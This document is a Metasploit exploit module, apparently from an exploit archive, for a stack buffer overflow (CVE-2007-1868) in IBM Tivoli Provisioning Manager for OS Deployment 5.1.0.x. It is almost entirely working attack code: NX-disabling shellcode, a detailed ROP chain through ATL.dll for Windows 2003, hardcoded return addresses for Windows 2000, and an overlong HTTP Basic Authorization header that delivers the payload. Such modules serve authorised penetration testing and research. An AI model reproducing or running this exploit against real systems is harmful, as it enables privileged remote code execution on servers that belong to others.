IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow

`##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow',  
'Description' => %q{  
This is a stack overflow exploit for IBM Tivoli Provisioning Manager  
for OS Deployment version 5.1.0.X.  
},  
'Author' => 'toto',  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2007-1868'],  
[ 'OSVDB', '34678'],  
[ 'BID', '23264'],  
[ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-05' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 0x200,  
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a",  
'Prepend' =>   
# Disable NX on 2k3 to upload data on the stack  
# (service crashes if the stack is switched to the heap)  
"\x64\x8b\x0d\x30\x00\x00\x00" + # mov ecx, dword ptr fs:[0x30] ; PEB  
"\x83\xb9\xa4\x00\x00\x00\x05" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5  
"\x75\x30" + # jnz after  
"\x83\xb9\xa8\x00\x00\x00\x02" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2  
"\x75\x27" + # jnz after  
"\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0)  
"\x76\x1b" + # jbe after  
"\x8d\x89\xa8\x00\x00\x00" + # lea ecx, [ecx+0xa8]  
"\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300  
"\xb8\xed\x00\x00\x00" + # mov eax, 0xed  
"\x6a\x04" + # push 4  
"\x51" + # push ecx  
"\x6a\x22" + # push 22  
"\x6a\xff" + # push -1  
"\x6a\xff" + # push -1 (padding)  
"\xff\x12", # call dword ptr[edx]  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>   
[  
['TMPfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }],  
# tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll)  
['TMPfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000, 'Data' => 0x01061980 }],  
],  
'DisclosureDate' => 'May 02 2007',  
'DefaultTarget' => 0))  
  
register_options(   
[   
Opt::RPORT(443),  
OptBool.new('SSL', [true, 'Use SSL', true]),  
], self.class )  
end  
  
def exploit  
  
if target.name =~ /2003/  
# the exploit allocates and executable heap to copy and execute the payload  
  
auth = Rex::Text.rand_text_alphanumeric(2800)  
  
ib = target['IB']  
  
auth[ 2080, 4 ] = [ ib + 0x11010 ].pack('V') # store a data to prevent a crash  
  
# ret 1:  
# 76a81a5f:  
# pop esi <- 0x76a91010  
# pop ebx <- 0x76a91010  
# pop ebp <- 0x76a91010  
# retn  
  
auth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V')  
auth[ 2100, 4 ] = [ target['Data'] ].pack('V')  
auth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V')  
auth[ 2108, 4 ] = [ ib + 0x11010 ].pack('V')  
  
# ret 2:  
# 76a817f0:  
# pop esi <- 0x76a81512 (ocscpy pointer)  
# retn  
  
auth[ 2112, 4 ] = [ ib + 0x17f0 ].pack('V')  
auth[ 2116, 4 ] = [ ib + 0x1512 ].pack('V')  
  
# ret 3: (copy the payload in atl.dll data)  
# 76a811c8  
# lea eax, [esp+3c] <-- eax points to the payload  
# push eax <- payload  
# push ebp <- 0x76a91010  
# call esi <- ocscpy  
# cmp eax, ebx <- eax == ebx = 0x76a91010  
# jnz before <- jump not taken  
# mov eax, ebp  
# pop edi  
# pop esi  
# pop ebp  
# pop ebx  
# add esp, 1ch  
# retn  
  
auth[ 2120, 4 ] = [ ib + 0x11c8 ].pack('V')  
  
  
# ret 4: (increase the stack pointer to allow a jump back in the payload)  
# add esp, 1ch  
# retn   
  
auth[ 2160, 4 ] = [ ib + 0x11da ].pack('V')  
auth[ 2184, 2 ] = "\xeb\x56" # jmp payload   
  
  
# ret 5: (create an executable heap - huge one)  
# 76a8c0c4  
# jmp ds:__imp_HeapCreate (0xffffffff, 0x01010101, 0x01010101)  
  
auth[ 2196, 4 ] = [ ib + 0xc0c4 ].pack('V')  
  
# ret 6:  
# 76a817f0  
# pop esi <- 0x76a92a38 (hHeap)  
# retn  
  
auth[ 2204, 4 ] = [ ib + 0x17f0 ].pack('V')  
auth[ 2208, 4 ] = [ 0xffffffff ].pack('V')  
auth[ 2212, 4 ] = [ 0x01010101 ].pack('V')  
auth[ 2216, 4 ] = [ 0x01010101 ].pack('V')  
auth[ 2220, 4 ] = [ ib + 0x12a38 ].pack('V')  
  
# ret 7:  
# 76a8190a  
# mov [esi], eax <- store new heap in hHeap  
# mov eax, esi  
# pop esi  
# retn 4  
  
auth[ 2224, 4 ] = [ ib + 0x190a ].pack('V')  
  
# ret 8 (_calloc - needed to allocate a small buffer to prevent a no mem exception):  
# 76a88a29  
# mov eax, [esp+arg_0] <- 0x7fffffa0  
# imul eax, [esp+arg_4] <- eax * 0x7fffffa0 = 0x2400  
# push eax  
# call _malloc  
# pop ecx <- ecx = 0x2400  
# retn  
  
auth[ 2232, 4 ] = [ ib + 0x8a29 ].pack('V')  
  
# ret 9:  
# 76a8c9ab  
# add esp, 0ch  
# retn 4  
  
auth[ 2240, 4 ] = [ ib + 0xc9ab ].pack('V')  
auth[ 2244, 4 ] = [ 0x7fffffa0 ].pack('V')  
auth[ 2248, 4 ] = [ 0x7fffffa0 ].pack('V')  
  
# ret 10 (copy payload into heap):  
# 76a8c9a0  
# push ecx <- 0x2400  
# push [esp+8] <- 0x76a91010 (payload in atl.dll data)  
# push eax <- heap pointer  
# call _memcpy  
# add esp, 0ch  
# retn  
  
auth[ 2256, 4 ] = [ ib + 0xc9a0 ].pack('V')  
  
# ret 11 (jump into heap)  
# 76a815e7  
# call eax  
  
auth[ 2264, 4 ] = [ ib + 0x15e7 ].pack('V')  
auth[ 2268, 4 ] = [ ib + 0x11010 ].pack('V')  
  
auth[ 2272, payload.encoded.length ] = payload.encoded  
  
else  
auth = Rex::Text.rand_text_alphanumeric(2800)  
  
auth[ 2080, 4 ] = [ target['Rets'][1] ].pack('V')  
auth[ 2096, 4 ] = [ target['Rets'][2] ].pack('V') # pop, ret  
auth[ 2100, 4 ] = [ target['Rets'][1] ].pack('V')  
auth[ 2104, 4 ] = [ target['Rets'][0] ].pack('V') # jmp esp  
auth[ 2108, payload.encoded.length ] = payload.encoded  
  
end  
  
print_status("Trying target #{target.name}...")  
  
res = send_request_cgi({  
'uri' => '/',  
'method' => 'GET',  
'headers' =>   
{  
'Authorization' => "Basic #{auth}"  
}  
}, 5)  
  
handler  
end  
  
end  
`